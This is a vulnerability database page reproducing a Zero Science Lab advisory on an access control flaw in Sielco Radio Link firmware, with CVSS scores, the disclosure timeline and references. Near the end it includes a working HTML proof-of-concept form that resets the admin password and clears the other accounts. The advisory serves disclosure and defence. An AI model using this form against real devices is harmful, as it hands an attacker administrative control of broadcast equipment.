Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zeroscienceGjoko KrsticZSL-2023-5760
HistoryMar 30, 2023 - 12:00 a.m.

Sielco Radio Link 2.06 Improper Access Control Change Admin Password

2023-03-3000:00:00
Gjoko Krstic
zeroscience.mk
182
sielco
radio link
access control
admin password
http post
vulnerability
security advisory
vendor
impact
risk
exploit
zero science lab

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

AI Score

6.9

Confidence

High

EPSS

0.001

Percentile

18.6%

JSON

Title: Sielco Radio Link 2.06 Improper Access Control Change Admin Password
Advisory ID: ZSL-2023-5760
Type: Local/Remote
Impact: Security Bypass
Risk: (4/5)
Release Date: 30.03.2023

Summary

Sielco develops and produces radio links for all transmission and reception needs, thanks to innovative units and excellent performances, accompanied by a high reliability and low consumption.

Description

The application suffers from improper access control when editing users. A user with Read permissions can manipulate users, passwords and permissions by sending a single HTTP POST request with modified parameters and edit other users’ names, passwords and permissions including admin password.

Vendor

Sielco S.r.l - <https://www.sielco.org>

Affected Version

2.06 (RTX19)
2.05 (RTX19)
2.00 (EXC19)
1.60 (RTX19)
1.59 (RTX19)
1.55 (EXC19)

Tested On

lwIP/2.1.1
Web/2.9.3

Vendor Status

[26.01.2023] Vulnerability discovered.
[27.01.2023] Contact with the vendor and CSIRT Italia.
[29.03.2023] No response from the vendor.
[29.03.2023] No response from the CSIRT team.
[30.03.2023] Public security advisory released.

PoC

sielco_rl_iac.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <https://packetstormsecurity.com/files/171847/&gt;
[2] <https://www.cisa.gov/news-events/ics-advisories/icsa-23-299-08&gt;
[3] <https://vulners.com/cve/CVE-2023-45228&gt;
[4] <https://nvd.nist.gov/vuln/detail/CVE-2023-45228&gt;
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/253070&gt;
[6] <https://exchange.xforce.ibmcloud.com/vulnerabilities/269708&gt;

Changelog

[30.03.2023] - Initial release
[03.11.2023] - Added reference [1], [2], [3], [4], [5] and [6]

Contact

Zero Science Lab

Web: <https://www.zeroscience.mk>
e-mail: [email protected]

<!--


Sielco Radio Link 2.06 Improper Access Control Change Admin Password


Vendor: Sielco S.r.l
Product web page: https://www.sielco.org
Affected version: 2.06 (RTX19)
                  2.05 (RTX19)
                  2.00 (EXC19)
                  1.60 (RTX19)
                  1.59 (RTX19)
                  1.55 (EXC19)

Summary: Sielco develops and produces radio links for all transmission
and reception needs, thanks to innovative units and excellent performances,
accompanied by a high reliability and low consumption.

Desc: The application suffers from improper access control when editing
users. A user with Read permissions can manipulate users, passwords and
permissions by sending a single HTTP POST request with modified parameters
and edit other users' names, passwords and permissions including admin
password.

Tested on: lwIP/2.1.1
           Web/2.9.3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5760
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5760.php


26.01.2023

--><html>
<body>
<form action="http://radiolink/protect/users_rx.htm" method="POST">
<input name="pwd0" type="hidden" value="Ch4nged12"/> <!-- This will set/modify admin pwd -->
<input name="pwd0bis" type="hidden" value="Ch4nged12"/> <!-- This will set/modify admin pwd -->
<input name="user1" type="hidden" value=""/> <!-- This will set/modify user1 -->
<input name="pwd1" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="pwd1bis" type="hidden" value=""/> <!-- This will set/modify user1 pwd -->
<input name="auth1" type="hidden" value="0"/> <!-- This will set user1 read perm -->
<input name="user2" type="hidden" value=""/> <!-- This will set/modify user2 -->
<input name="pwd2" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="pwd2bis" type="hidden" value=""/> <!-- This will set/modify user2 pwd -->
<input name="auth2" type="hidden" value="0"/> <!-- This will set user2 read perm -->
<input name="user3" type="hidden" value=""/> <!-- This will set/modify user3 -->
<input name="pwd3" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="pwd3bis" type="hidden" value=""/> <!-- This will set/modify user3 pwd -->
<input name="auth3" type="hidden" value="0"/> <!-- This will set user3 read perm -->
<input type="submit" value="Modify admin pwd, delete all users"/>
</form>
</body>
</html>

Related

cvelist 1
cve 1
prion 1
nvd 1
zeroscience 1
ics 1
cvelist
cvelist
CVE-2023-45228 Sielco Radio Link and Analog FM Transmitters Improper Access Control
2023-10-26 16:19:41
cve
cve
CVE-2023-45228
2023-10-26 17:15:09
prion
prion
Improper access control
2023-10-26 17:15:00
nvd
nvd
CVE-2023-45228
2023-10-26 17:15:09
zeroscience
zeroscience
Sielco Analog FM Transmitter 2.12 Improper Access Control Change Admin Password
2023-03-28 00:00:00
ics
ics
Sielco Radio Link and Analog FM Transmitters
2023-10-26 12:00:00

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

AI Score

6.9

Confidence

High

EPSS

0.001

Percentile

18.6%

JSON
Related for ZSL-2023-5760
cvelist1cve1prion1nvd1zeroscience1ics1